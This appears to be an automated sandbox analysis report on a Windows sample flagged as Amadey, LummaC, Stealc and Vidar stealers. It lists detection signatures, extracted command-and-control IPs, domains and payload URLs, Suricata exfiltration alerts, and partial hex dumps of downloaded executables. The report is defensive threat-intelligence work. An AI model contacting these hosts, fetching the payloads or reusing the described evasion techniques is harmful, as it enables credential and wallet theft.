Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1572052
MD5: 0bd6feab9ec3faa844bdcdce20bb139a
SHA1: 489a61c409dfb7d18be79e8ee0e6a357e2441b32
SHA256: 5facd021cf569f15595a5bca8a9e248e6c32c1811f8b4c70ca037a15fed258ab
Tags: exeuser-Bitsight
Infos:

Detection

Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Credential Flusher
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Drops PE files to the document folder of the user
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies windows update settings
Monitors registry run keys for changes
PE file contains section with special chars
Potentially malicious time measurement code found
Query firmware table information (likely to detect VMs)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Browser Started with Remote Debugging
Sigma detected: CurrentVersion Autorun Keys Modification
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Antivirus detection for URL or domain
Source: https://atten-supporse.biz/apitW Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpfox Avira URL Cloud: Label: malware
Source: http://185.215.113.16/off/def.exez1 Avira URL Cloud: Label: malware
Source: http://185.215.113.16/off/def.exez. Avira URL Cloud: Label: malware
Source: http://185.215.113.16/off/random.exe4 Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe Avira: detection malicious, Label: HEUR/AGEN.1320706
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exe Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Found malware configuration
Source: 0000000E.00000002.2623989684.0000000000511000.00000040.00000001.01000000.0000000B.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 00000025.00000002.3252381859.00000000016EB000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
Source: feb3d39b6a.exe.6568.19.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["dare-curbys.biz", "impend-differ.biz", "formy-spill.biz", "atten-supporse.biz", "se-blurry.biz", "dwell-exclaim.biz", "covery-mover.biz", "zinc-sneark.biz", "print-vexer.biz"], "Build id": "LOGS11--LiveTraffic"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exe ReversingLabs: Detection: 21%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[2].exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe ReversingLabs: Detection: 21%
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe ReversingLabs: Detection: 42%
Multi AV Scanner detection for submitted file
Source: file.exe ReversingLabs: Detection: 44%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C4E6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 0_2_6C4E6C80
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49898 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49905 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49915 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49923 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49930 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49938 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49946 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49951 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49953 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49968 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49979 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:49991 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49992 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:49993 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:50001 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:50016 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:50029 version: TLS 1.2
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2618534099.000000006C54D000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2619103776.000000006C70F000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2619103776.000000006C70F000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: feb3d39b6a.exe, 00000013.00000002.3346267958.0000000005FF2000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2618534099.000000006C54D000.00000002.00000001.01000000.0000000A.sdmp
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: chrome.exe Memory has grown: Private usage: 1MB later: 38MB
Source: firefox.exe Memory has grown: Private usage: 1MB later: 198MB

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.5:49704
Source: Network traffic Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.5:49704
Source: Network traffic Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.5:49847 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.5:49853
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49875 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057921 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (atten-supporse .biz) : 192.168.2.5:62742 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49897 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49898 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49905 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49915 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49923 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49921 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49930 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49931 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49938 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49939 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49946 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49951 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49953 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49968 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49979 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49980 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49992 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49999 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:50001 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:50016 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:50029 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50072 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49898 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49898 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49946 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49946 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49938 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49953 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49953 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49979 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49905 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49905 -> 104.21.16.1:443
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://185.215.113.206/c4becf79229cb002.php
Source: Malware configuration extractor URLs: dare-curbys.biz
Source: Malware configuration extractor URLs: impend-differ.biz
Source: Malware configuration extractor URLs: formy-spill.biz
Source: Malware configuration extractor URLs: atten-supporse.biz
Source: Malware configuration extractor URLs: se-blurry.biz
Source: Malware configuration extractor URLs: dwell-exclaim.biz
Source: Malware configuration extractor URLs: covery-mover.biz
Source: Malware configuration extractor URLs: zinc-sneark.biz
Source: Malware configuration extractor URLs: print-vexer.biz
Source: Malware configuration extractor IPs: 185.215.113.43
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 10 Dec 2024 01:50:04 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 10 Dec 2024 01:50:31 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 